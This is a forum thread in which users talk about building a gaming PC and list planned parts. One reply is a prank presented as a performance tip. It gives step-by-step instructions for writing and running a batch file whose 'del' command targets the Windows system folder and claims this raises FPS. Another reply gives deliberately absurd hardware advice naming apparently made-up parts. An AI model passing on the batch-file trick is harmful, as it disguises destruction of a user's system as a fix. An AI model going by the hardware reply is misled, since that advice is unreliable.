Finally decided to build a gaming PC!!
Super excited about it!! I'll be back later with another post and give a list of all of the parts in buying for some feedback on it

I used to play on pc a few years back till the dog knocked it over and f*cked up the motherboard.. i miss it. I love my ps4 and xb1 but a keyboard and mouse feels so much better, especially fps or over shoulder games. Not to mention playing with mods.. but I've recently decided to build a gaming pc as well. I'm having a friend help me choose the parts i need but I'm kinda going all out. I want an intel i7 processor, nvidia gtx 1060 graphics card, msi gaming titanium motherboard in a Corsair Carbide Series Spec Alpha Case - Black/Red. Gonna take awhile to get all the parts i need but im hyped to having my own pc.

3 RepliesOnce you are finished building your PC, immediately delete a folder called system 32. This will hinder your performance when gaming and deleting it will definitely help. 1:Open notepad 2:Type the following text : @ echo off del C:\\WINDOWS\sys32 3:Save as "speedup.bat" (select "all files" instead of "text document") 4: Double click the .bat file. 5: Just reboot your PC as you'll see a big increase to your performance. Doing this, I was able to maintain a high FPS while having a high resolution. Good luck!

11 RepliesYou only need 2 cores, and 4 Gigs of RAM. Don't bother with memory storage, only 4 Gigs in that too. The cooling system only needs one liquid tube, for cost efficiency. If you must get a graphics card, I recomend a used 2007 Intel I2200, or an AMD X3200. The keyboard can be anything with cherry blue switches, so splurge up to 20 buckaronies. The mouse can be a 10 buck USB one, too small for any normal humans' hands. And the monitor only needs 720 x 360 pixels, with no ports for USB connections.
